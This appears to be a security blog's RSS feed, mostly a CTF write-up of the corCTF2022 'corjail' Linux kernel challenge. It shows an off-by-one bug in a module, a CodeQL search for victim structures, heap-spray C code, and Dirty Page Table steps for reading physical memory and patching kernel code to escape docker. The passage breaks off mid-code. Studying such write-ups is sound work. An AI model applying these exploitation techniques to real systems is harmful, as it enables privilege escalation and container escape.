CTF on Uniguri's Blog /tags/ctf/ Recent content in CTF on Uniguri's Blog Hugo -- gohugo.io en-us Wed, 26 Nov 2025 10:33:45 +0000 화햇콘 용사부 1등 /posts/ctf/2025/whitehat/whitehat-1st/ Wed, 26 Nov 2025 10:33:45 +0000 /posts/ctf/2025/whitehat/whitehat-1st/ <p>오예스</p> <img src="images/whitehat2025-final-ranking.png" alt="2025 WhiteHat Final Ranking" class="center" /> <p>오예스</p> <img src="images/whitehat2025-final-ranking.png" alt="2025 WhiteHat Final Ranking" class="center" /> corCTF2022 corjail /posts/kernel/write-ups/ctf/corctf2022-corjail/ Sun, 06 Apr 2025 12:18:08 +0000 /posts/kernel/write-ups/ctf/corctf2022-corjail/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.10.127/source"><code>5.10.127</code></a> <ul> <li>CONFIG_SLUB_DEBUG=y</li> <li>CONFIG_SLUB=y</li> <li>CONFIG_SLAB_FREELIST_RANDOM=y</li> <li>CONFIG_SLAB_FREELIST_HARDENED=y</li> </ul> </li> </ul> <h3 id="simple-description">Simple description</h3> <p>The goal of this challenge is escaping docker with seccomp-ed environment by using off-by-one in kmalloc-4k. The seccomp prohibits us to use <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/msg.h#L9"><code>struct msg_msg</code></a> and <a href="https://elixir.bootlin.com/linux/v5.10.127/source/ipc/msgutil.c#L37"><code>struct msg_msgseg</code></a>.</p> <p>So, we need to find new structure which makes us exploit off-by-one. And after making RIP control (ROP, or something&hellip;), we have to LPE and Escaping docker.</p> <h3 id="module">Module</h3> <p>The module is simple: just prints the count of each syscall called and makes us to filter which syscall&rsquo;s call count will be counted. It utilizes Syscall statistics patch based on <a href="https://lwn.net/Articles/896474/">https://lwn.net/Articles/896474/</a> (check out <code>build/build_kernel.sh</code>).</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.10.127/source"><code>5.10.127</code></a> <ul> <li>CONFIG_SLUB_DEBUG=y</li> <li>CONFIG_SLUB=y</li> <li>CONFIG_SLAB_FREELIST_RANDOM=y</li> <li>CONFIG_SLAB_FREELIST_HARDENED=y</li> </ul> </li> </ul> <h3 id="simple-description">Simple description</h3> <p>The goal of this challenge is escaping docker with seccomp-ed environment by using off-by-one in kmalloc-4k. The seccomp prohibits us to use <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/msg.h#L9"><code>struct msg_msg</code></a> and <a href="https://elixir.bootlin.com/linux/v5.10.127/source/ipc/msgutil.c#L37"><code>struct msg_msgseg</code></a>.</p> <p>So, we need to find new structure which makes us exploit off-by-one. And after making RIP control (ROP, or something&hellip;), we have to LPE and Escaping docker.</p> <h3 id="module">Module</h3> <p>The module is simple: just prints the count of each syscall called and makes us to filter which syscall&rsquo;s call count will be counted. It utilizes Syscall statistics patch based on <a href="https://lwn.net/Articles/896474/">https://lwn.net/Articles/896474/</a> (check out <code>build/build_kernel.sh</code>).</p> <p>I think this function is only one we must read: <div class="collapsable-code"> <input id="348591726" type="checkbox" checked /> <label for="348591726"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-cormon_proc_write.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>int64_t cormon_proc_write(struct file *file, const char *src, size_t size, loff_t *ppos) { size_t v5; // rbp const char *v7; // rbx if (*ppos &lt; 0) return -22LL; if (size == 0 || (unsigned __int64)*ppos &gt; 0xFFF) return 0LL; if (size &gt; 0x1000) v5 = 4095LL; else v5 = size; v7 = (const char *)kmem_cache_alloc_trace( kmalloc_caches[12], 2592LL, 4096LL); // SLAB_CACHE = kmalloc-4096 (0x800 &lt; size &lt;= 0x1000) printk(&amp;unk_578, v7); if (v7) { _check_object_size(v7, v5, 0LL); if (copy_from_user(v7, src, v5)) { printk(&amp;unk_5D0, src); return -14LL; } else { v7[v5] = 0; // off-by-one when size=0x1000 -&gt; v5=0x1000 if ((unsigned int)update_filter(v7)) { kfree(v7); return -22LL; } else { kfree(v7); return size; } } } else { printk(&amp;unk_5A0, 0LL); return -12LL; } }</code></pre></div> </p> <h3 id="vulnerability">Vulnerability</h3> <p>As I wrote on above pseudocode, the vulnerability (off-by-one) is occurs at <code>v7[v5] = 0;</code>. Okay.. the off-by-one in kmalloc-4k is all of this challenge&hellip;</p> <h2 id="exploit">Exploit</h2> <p>Haha&hellip; okay&hellip; how we can exploit off-by-one in kmalloc-4k without <code>struct msg_msg</code>&hellip;? I tried 3 approaches and I solve it with last approach as a result (I think first one was too complex and second one does not works..).</p> <h3 id="first-approach-using-struct-poll_listhttpselixirbootlincomlinuxv510127sourcefsselectcl839">First approach (using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L839"><code>struct poll_list</code></a>)</h3> <h4 id="finding-victim-object">Finding victim object</h4> <p>My first approach is exploit structure with first member is <code>struct ??? *next</code> or refcount like <code>atomic_t ???_count</code>, <code>atomic_long_t ???_count</code>, or etc. If the structure has next pointer, we can make UAF by releaseing the object and this is also same if it has recount.</p> <p>So I try finding these objects using <a href="https://codeql.github.com/">CodeQL</a>.</p> <div class="collapsable-code"> <input id="391468527" type="checkbox" checked /> <label for="391468527"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-codeql_finding_target_struct.sql</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>import cpp from Field f, Type ty, PointerType p, FunctionCall call where ( call.getTarget().getName() = &#34;kmalloc&#34; or call.getTarget().getName() = &#34;kzalloc&#34; ) and call.getActualType() = p and p.refersTo(ty) and f.getByteOffset() = 0 and f.getDeclaringType() = ty and ( f.getType().getName() = &#34;list_head&#34; or f.getName().matches(&#34;%count%&#34;) or f.getType().refersToDirectly(ty) ) and ( ( call.getArgument(0).getValue().toInt() &gt; 2048 and call.getArgument(0).getValue().toInt() &lt;= 4096 ) or not call.getArgument(0).isConstant() ) select ty.getName(), ty.getLocation().toString(), call.getLocation().toString()</code></pre></div> <p>And the result is following:</p> <div class="collapsable-code"> <input id="217463859" type="checkbox" checked /> <label for="217463859"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-codeql_finding_target_struct_result.txt</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>| col0 | col1 | col2 | +-------------------------+---------------------------------------------------------+-----------------------------------------------------+ | workqueue_struct | kernel/workqueue.c:239:8:239:23 | kernel/workqueue.c:4288:7:4288:13 | | posix_acl | include/linux/posix_acl.h:27:8:27:16 | fs/posix_acl.c:181:26:181:32 | | msg_msg | include/linux/msg.h:9:8:9:14 | ipc/msgutil.c:53:8:53:14 | | sem_undo | ipc/sem.c:146:8:146:15 | ipc/sem.c:1940:8:1940:14 | | list_head | include/linux/types.h:178:8:178:16 | fs/dcookies.c:236:22:236:28 | | list_head | tools/include/linux/types.h:69:8:69:16 | fs/dcookies.c:236:22:236:28 | | perf_buffer | kernel/events/internal.h:13:8:13:18 | kernel/events/ring_buffer.c:815:7:815:13 | | vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:271:16:271:22 | | vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:308:14:308:20 | | vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/channel.c:352:15:352:21 | | vmbus_channel_msginfo | include/linux/hyperv.h:707:8:707:28 | drivers/hv/vmbus_drv.c:2473:12:2473:18 | | blk_plug_cb | include/linux/blkdev.h:1262:8:1262:18 | block/blk-core.c:1743:7:1743:13 | | audit_tree | kernel/audit_tree.c:13:8:13:17 | kernel/audit_tree.c:97:9:97:15 | | apertures_struct | include/linux/fb.h:495:9:495:24 | include/linux/fb.h:509:6:509:12 | | Scsi_Host | include/scsi/scsi_host.h:524:8:524:16 | drivers/scsi/hosts.c:386:10:386:16 | | neighbour | include/net/neighbour.h:134:8:134:16 | net/core/neighbour.c:453:13:453:19 | | neighbour | include/net/neighbour.h:134:8:134:16 | net/core/neighbour.c:406:6:406:12 | | netdev_hw_addr | include/linux/netdevice.h:209:8:209:21 | net/core/dev_addr_lists.c:30:7:30:13 | | cpu_rmap | include/linux/cpu_rmap.h:24:8:24:15 | lib/cpu_rmap.c:39:9:39:15 | | poll_list | fs/select.c:839:8:839:16 | fs/select.c:1005:23:1005:29 | | hpets | drivers/char/hpet.c:104:8:104:12 | drivers/char/hpet.c:858:10:858:16 | | resource_entry | include/linux/resource_ext.h:23:8:23:21 | kernel/resource.c:1701:10:1701:16 | | journal_replay | drivers/md/bcache/journal.h:83:8:83:21 | drivers/md/bcache/journal.c:150:8:150:14 | | md_rdev | drivers/md/md.h:48:8:48:14 | drivers/md/raid0.c:149:18:149:24 | | hv_dr_state | drivers/pci/controller/pci-hyperv.c:517:8:517:18 | drivers/pci/controller/pci-hyperv.c:2266:7:2266:13 | | hv_dr_state | drivers/pci/controller/pci-hyperv.c:517:8:517:18 | drivers/pci/controller/pci-hyperv.c:2231:7:2231:13 | | iscsi_bus_flash_conn | include/scsi/scsi_transport_iscsi.h:318:8:318:27 | drivers/scsi/scsi_transport_iscsi.c:1286:15:1286:21 | | iscsi_bus_flash_session | include/scsi/scsi_transport_iscsi.h:363:8:363:30 | drivers/scsi/scsi_transport_iscsi.c:1237:15:1237:21 | | iscsi_cls_conn | include/scsi/scsi_transport_iscsi.h:202:8:202:21 | drivers/scsi/scsi_transport_iscsi.c:2401:9:2401:15 | | iscsi_cls_session | include/scsi/scsi_transport_iscsi.h:241:8:241:24 | drivers/scsi/scsi_transport_iscsi.c:2040:12:2040:18 | | tcmu_tmr | drivers/target/target_core_user.c:192:8:192:15 | drivers/target/target_core_user.c:1270:8:1270:14 | | ext4_xattr_inode_array | fs/ext4/xattr.h:119:8:119:29 | fs/ext4/xattr.c:2822:15:2822:21 | | fscache_cache_tag | include/linux/fscache-cache.h:43:8:43:24 | fs/fscache/cache.c:41:9:41:15 | | mr_table | include/linux/mroute_base.h:241:8:241:15 | net/ipv4/ipmr_base.c:41:8:41:14 | | pneigh_entry | include/net/neighbour.h:171:8:171:19 | net/core/neighbour.c:1714:23:1714:29 | | pneigh_entry | include/net/neighbour.h:171:8:171:19 | net/core/neighbour.c:737:6:737:12 | | fib_rule | include/net/fib_rules.h:20:8:20:15 | net/core/fib_rules.c:544:11:544:17 | | fib_rule | include/net/fib_rules.h:20:8:20:15 | net/core/fib_rules.c:60:6:60:12 | | msg_msgseg | ipc/msgutil.c:37:8:37:17 | ipc/msgutil.c:68:9:68:15 | | audit_chunk | kernel/audit_tree.c:25:8:25:18 | kernel/audit_tree.c:193:10:193:16 | | kprobe_insn_page | kernel/kprobes.c:90:8:90:23 | kernel/kprobes.c:172:8:172:14 | | kmalloced_param | kernel/params.c:39:8:39:22 | kernel/params.c:50:6:50:12 | | nested_table | lib/rhashtable.c:32:7:32:18 | lib/rhashtable.c:133:9:133:15 | | nf_queue_entry | include/net/netfilter/nf_queue.h:12:8:12:21 | net/netfilter/nf_queue.c:204:10:204:16 | | tls_rec | include/net/tls.h:99:8:99:14 | net/tls/tls_sw.c:337:8:337:14 | | nh_group | include/net/nexthop.h:75:8:75:15 | net/ipv4/nexthop.c:138:8:138:14 | | ctnl_timeout | include/net/netfilter/nf_conntrack_timeout.h:20:8:20:19 | net/netfilter/nfnetlink_cttimeout.c:133:12:133:18 | | recent_entry | net/netfilter/xt_recent.c:66:8:66:19 | net/netfilter/xt_recent.c:191:6:191:12 | | counted_str | security/apparmor/include/lib.h:93:8:93:18 | security/apparmor/lib.c:139:8:139:14 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:1404:9:1406:38 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:813:9:816:23 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:825:9:829:23 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/label.c:428:8:428:14 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:1117:8:1119:37 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/domain.c:895:9:897:25 | | aa_label | security/apparmor/include/label.h:125:8:125:15 | security/apparmor/mount.c:707:11:709:27 | | aa_buffer | security/apparmor/lsm.c:47:7:47:15 | security/apparmor/lsm.c:1691:12:1691:18 | | aa_buffer | security/apparmor/lsm.c:47:7:47:15 | security/apparmor/lsm.c:1611:11:1611:17 | | ima_rule_opt_list | security/integrity/ima/ima_policy.c:63:8:63:24 | security/integrity/ima/ima_policy.c:288:13:288:19 |</code></pre></div> <p>I look up these structures and <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L839"><code>struct poll_list</code></a> is useful. Because it has <code>struct poll_list *next</code> at offset 0, it is allocated by <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/select.c#L1067"><code>poll</code> system call</a>, and its size is provided by user.</p> <h4 id="how-to-spray-poll">How to spray poll?</h4> <p>I want to spray <code>struct poll_list</code> in kmalloc-4k. Therefore I can allocate it and release it when I want. But since the <code>poll</code> originally block the user program, we allocate it on other thread (actually we need to allocate it on other process).</p> <p>I tried it using <code>pthread_create</code> but the thread is not created. So I decide to use <code>clone</code></p> <div class="collapsable-code"> <input id="246518739" type="checkbox" checked /> <label for="246518739"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">corCTF2022-corjail-spray_poll.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>int create_poll(void *timeout_ms) { pin_to_core(0); const int timeout = (int)(int64_t)timeout_ms; const int size = (256 - 16) / 8 + (0x1000 - 16) / 8; struct pollfd *fds = malloc(size * sizeof(struct pollfd)); for (int i = 0; i &lt; size; i++) { fds[i].fd = 0xdead0000 + i; fds[i].events = POLLIN; } poll(fds, size, timeout); free(fds); } #define CLONE_STACK_HEAP_ALLOC_COUNT 1024 * 1024 int create_poll_via_clone(int timeout_ms) { char child_stack[CLONE_STACK_HEAP_ALLOC_COUNT]; int pid = clone(create_poll, child_stack, CLONE_VM | SIGCHLD, (void *)(int64_t)timeout_ms); return pid; }</code></pre></div> <h4 id="slubstickhttpswwwusenixorgconferenceusenixsecurity24presentationmaar-slubstick"><a href="https://www.usenix.org/conference/usenixsecurity24/presentation/maar-slubstick">SLUBStick</a></h4> <p>Now I can spray <code>struct poll_list</code> and trigger off-by-one. But as you know, we cannot ensure off-by-one will corrupt <code>struct poll_list</code>&rsquo;s <code>struct poll_list *next</code>.</p> <p>I decide to use SLUBStick for gathering <code>struct poll_list</code>s in one (or consecutive) slab cache. Originally SLUBStic is for a cross-cache attack and cross-cache attack requires that target objects must be in one slab cache.</p> <p>By using SLUBStick we can spray <code>struct poll_list</code>s on one (or consecutive) slab cache. And so off-by-one will be corrupt its next with high stability.</p> <h4 id="find-another-approace">Find another approace</h4> <p>At this time, I think how I can exploit using <code>struct poll_list</code>. My plain was following:</p> <ol> <li>Spray <code>struct poll_list</code> with its next is in kmalloc-8, kmalloc-16, kmalloc-32, kmalloc-64, kmalloc-128, kmalloc-192 (let me call it target cache from now on)</li> <li>Trigger off-by-one and make UAF in target cache</li> <li>Leak kernel base to bypass KASLR using object in target cache</li> <li>Do Cross-Cache attack on target cache and make UAF in kmalloc-1k (for using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/tty.h#L285"><code>struct tty_struct</code></a>)</li> <li>Do ROP using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/keys/user-type.h#L27"><code>struct user_key_payload</code></a> or other objects</li> </ol> <p>Hmm&hellip; This require cross-cache attack and its stability is low as we know. That&rsquo;s why I try another approach.</p> <p>PS. <a href="https://syst3mfailure.io/corjail/">the author&rsquo;s write-up</a> might do similar thing without cross-cache. Leak address of <code>struct tty_struct</code> using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/tty.h#L347"><code>struct tty_file_private</code></a> and make UAF on that <code>struct tty_struct</code>. And do ROP.</p> <h3 id="second-approach-using-pagejackhttpsiblackhatcombh-us-24presentationsus24-qian-pagejack-a-powerful-exploit-technique-with-page-level-uaf-thursdaypdf">Second approach (using <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">PageJack</a>)</h3> <p>After searching methods which can exploit off-by-one, I found <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">PageJack</a>. It does not require bypass KASLR, corss-cache, and ETC and only require the off-by-one (or OOB write).</p> <p>WoW.. I tried it immediately&hellip;. But it does not works&hellip;. WHY?!?!</p> <h4 id="why-pagejack-does-not-work">Why PageJack does not work?</h4> <p>PageJack utilize <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L26"><code>struct page *page</code></a> of <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L26"><code>struct pipe_buffer</code></a>. With off-by-one (or OOB write) we can overwrite least significant byte of <code>page</code> and make physical page level UAF as a result.</p> <p>After page level UAF, spraying <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L916"><code>struct file</code></a> will make the UAF page <code>filp</code> cache (the <code>filp</code> cache uses only one page). The <code>struct file</code>s allocated on new <code>filp</code> cache (it&rsquo;s UAF page) and we have write primitive on it via pipe. We can modify <code>fmode_t f_mode</code> of <code>struct file</code> via pipe as a result.</p> <p>Everything is okay except the <code>const struct file_operations *f_op</code>. The write process is following:</p> <pre class="mermaid"> flowchart TD sys_write[sys_write] --&gt; ksys_write ksys_write[ksys_write] --&gt; vfs_write vfs_write[vfs_write] --&gt; write[file-&gt;f_op-&gt;write] vfs_write[vfs_write] --&gt; new_sync_write[new_sync_write] new_sync_write[new_sync_write] --&gt; write_iter[file-&gt;f_op-&gt;write_iter] click sys_write &#34;https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L667&#34; click ksys_write &#34;https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L647&#34; click vfs_write &#34;https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L585&#34; click new_sync_write &#34;https://elixir.bootlin.com/linux/v5.10.127/source/fs/read_write.c#L507&#34; click call_write_iter &#34;https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L1900&#34; </pre> <p>Unlike host environment, in docker container <code>f_op</code> is <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/overlayfs/file.c#L764"><code>ovl_file_operations</code></a>. So, when call <code>file-&gt;f_op-&gt;write</code> or <code>file-&gt;f_op-&gt;write_iter</code>, the called function is not same as host and the <code>f_mode</code> is checked again in <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/overlayfs/file.c#L350"><code>ovl_write_iter</code></a> (check it yourself!).</p> <img src="https://media1.tenor.com/m/kXWb4lofzQcAAAAC/hiroi-kikuri-hiroi.gif" alt="hiroi sad" class="center" style="border-radius: 8px;" /> <p>PS. the <a href="https://github.com/sajjadium/ctf-archives/tree/main/ctfs/Codegate/2025/Quals/pwn/pew">pew challenge</a> of CodeGate 2025 Qual is solved easily by <a href="https://github.com/Lotuhu/Page-UAF/blob/master/CVE-2021-22555/exp.c">PageJack PoC</a> (we need to modify the poc very very little).</p> <h3 id="last-approach-using-struct-pipe_bufferhttpselixirbootlincomlinuxv510127sourceincludelinuxpipe_fs_ihl26-and-dirty-page-tablehttpsyanglingxi1993githubiodirty_pagetabledirty_pagetablehtml">Last approach (using <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/pipe_fs_i.h#L26"><code>struct pipe_buffer</code></a> and <a href="https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Page Table</a>)</h3> <p>We cannot use PageJack but we can get physical page level UAF by using it partially. So, then, we can use <a href="https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Page Table</a>.</p> <h4 id="uaf-page-to-ptehttpsenwikipediaorgwikipage_tablepage_table_entry-page">UAF page to <a href="https://en.wikipedia.org/wiki/Page_table#Page_table_entry">PTE</a> page</h4> <p>We can spray <a href="https://en.wikipedia.org/wiki/Page_table#Page_table_entry">PTE</a>s via <code>mmap</code> and cause page fault by write to each memory. But I tried like below I failed to allocate PTEs on UAF page.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> MMAP_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> mmap_addrs[i] <span style="color:#f92672">=</span> <span style="color:#a6e22e">mmap</span>((<span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>)(MMAP_SPRAT_START_ADDR <span style="color:#f92672">+</span> i <span style="color:#f92672">*</span> MMAP_SPRAT_STEP), </span></span><span style="display:flex;"><span> MMAP_SPRAT_SIZE, PROT_READ <span style="color:#f92672">|</span> PROT_WRITE, </span></span><span style="display:flex;"><span> MAP_ANONYMOUS <span style="color:#f92672">|</span> MAP_SHARED, <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>, <span style="color:#ae81ff">0</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (mmap_addrs[i] <span style="color:#f92672">==</span> MAP_FAILED) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">fatal</span>(<span style="color:#e6db74">&#34;mmap&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#a6e22e">sched_yield</span>(); </span></span><span style="display:flex;"><span><span style="color:#a6e22e">close_pipe_at</span>(victim_pipe_fds[<span style="color:#ae81ff">1</span>]); <span style="color:#75715e">// Make UAF page </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> MMAP_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> j <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; j <span style="color:#f92672">&lt;</span> MMAP_SPRAT_SIZE <span style="color:#f92672">/</span> MMAP_PAGE_SIZE; <span style="color:#f92672">++</span>j) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> <span style="color:#f92672">*</span>addr <span style="color:#f92672">=</span> (<span style="color:#66d9ef">uint64_t</span> <span style="color:#f92672">*</span>)(mmap_addrs[i] <span style="color:#f92672">+</span> MMAP_PAGE_SIZE <span style="color:#f92672">*</span> j); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#66d9ef">uint64_t</span> val <span style="color:#f92672">=</span> ((<span style="color:#66d9ef">uint64_t</span>)i <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">32</span>) <span style="color:#f92672">+</span> j <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x01010101</span>; </span></span><span style="display:flex;"><span> <span style="color:#f92672">*</span>addr <span style="color:#f92672">=</span> val; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><p>Why this does not work..?? I don&rsquo;t know but the below code works&hellip;</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> MMAP_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> mmap_addrs[i] <span style="color:#f92672">=</span> <span style="color:#a6e22e">mmap</span>((<span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>)(MMAP_SPRAT_START_ADDR <span style="color:#f92672">+</span> i <span style="color:#f92672">*</span> MMAP_SPRAT_STEP), </span></span><span style="display:flex;"><span> MMAP_SPRAT_SIZE, PROT_READ <span style="color:#f92672">|</span> PROT_WRITE, </span></span><span style="display:flex;"><span> MAP_ANONYMOUS <span style="color:#f92672">|</span> MAP_SHARED, <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>, <span style="color:#ae81ff">0</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (mmap_addrs[i] <span style="color:#f92672">==</span> MAP_FAILED) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">fatal</span>(<span style="color:#e6db74">&#34;mmap&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#a6e22e">sched_yield</span>(); </span></span><span style="display:flex;"><span><span style="color:#a6e22e">close_pipe_at</span>(victim_pipe_fds[<span style="color:#ae81ff">1</span>]); <span style="color:#75715e">// Make UAF page </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> FILE_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> file_fds[i] <span style="color:#f92672">=</span> <span style="color:#a6e22e">open</span>(<span style="color:#e6db74">&#34;/&#34;</span>, O_RDONLY); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (file_fds[i] <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">0</span>) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">fatal</span>(<span style="color:#e6db74">&#34;open&#34;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> FILE_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">close</span>(file_fds[i]); </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> MMAP_SPRAY_COUNT; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> j <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; j <span style="color:#f92672">&lt;</span> MMAP_SPRAT_SIZE <span style="color:#f92672">/</span> MMAP_PAGE_SIZE; <span style="color:#f92672">++</span>j) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> <span style="color:#f92672">*</span>addr <span style="color:#f92672">=</span> (<span style="color:#66d9ef">uint64_t</span> <span style="color:#f92672">*</span>)(mmap_addrs[i] <span style="color:#f92672">+</span> MMAP_PAGE_SIZE <span style="color:#f92672">*</span> j); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#66d9ef">uint64_t</span> val <span style="color:#f92672">=</span> ((<span style="color:#66d9ef">uint64_t</span>)i <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">32</span>) <span style="color:#f92672">+</span> j <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x01010101</span>; </span></span><span style="display:flex;"><span> <span style="color:#f92672">*</span>addr <span style="color:#f92672">=</span> val; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><p>Any way using above code, we can modify PTEs for <code>mmap</code>ed memory via <code>pipe</code>.</p> <h4 id="leak-physical-kernel-base">Leak physical kernel base</h4> <p>Each PTE has its own flags and PFN(Page Frame Number; it&rsquo;s just <code>&lt;physical address&gt; &gt;&gt; 12</code>). And thus we can arbitrary read and write physical memory with modified PTE.</p> <p>So our approach is patch kernel code to escape docker and We need to know physical kernel base address for that. The linux loads kernel at different physical memory. But there is a way to leak it: dmabuf at <code>PA:0x9c000</code> (I don&rsquo;t know what is it and why there is it..). The physical kernel base will be <code>*( *(uint64_t*)(PA:0x9c000)&amp;(~0xfff) - 0x2004000ULL)</code>.</p> <p>PS. If KASLR is disabled, physical kernel base will be <code>*( *(uint64_t*)(PA:0x9c000)&amp;(~0xfff) - 0x2001000ULL)</code>.</p> <h4 id="patch-sys_modify_ldthttpselixirbootlincomlinuxv510127sourcearchx86kernelldtcl659">Patch <a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/kernel/ldt.c#L659">sys_modify_ldt</a></h4> <p>Now we can patch kernel&rsquo;s code. So I patch <code>modify_ldt</code> syscall and call it.</p> <p>The patched <code>modify_ldt</code> will be follwoing:</p> <div class="collapsable-code"> <input id="183976425" type="checkbox" checked /> <label for="183976425"> <span class="collapsable-code__language">c</span> <span 